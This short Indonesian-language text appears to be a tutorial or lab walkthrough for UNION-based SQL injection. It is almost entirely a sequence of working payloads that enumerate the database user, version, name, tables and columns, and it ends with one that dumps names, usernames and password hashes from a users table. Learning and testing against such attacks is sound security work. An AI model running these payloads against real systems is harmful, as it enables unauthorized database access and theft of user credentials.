Charlie Sierra
Untuk melihat nama user database, menggunakan command berikut ‘union select null,user() #’ Untuk melihat versi database, bisa menggunakan command berikut ‘union select null,version() #’ Untuk melihat nama database, bisa menggunakan command berikut ‘union select null,database() #’ melihat tabel apa saja yang ada pada database, ketikan command berikut ‘union select null,table_name from information_schema.tables #’ mencari database yang berisikan tabel dengan nama yang mengandung kata user, ketikan command berikut ‘union select null,table_name from information_schema.tables where table_name like ‘user%’ #’ melihat isi kolom yang ada pada tabel users ‘union select null,concat (column_name) from information_schema.columns where table_name = ‘users’ #’ mendapatkan informasi yang berisikan firstname, lastname, username, dan password. ‘union select null, concat (first_name, 0x0a, last_name, 0x0a, user, 0x0a, password) from users #’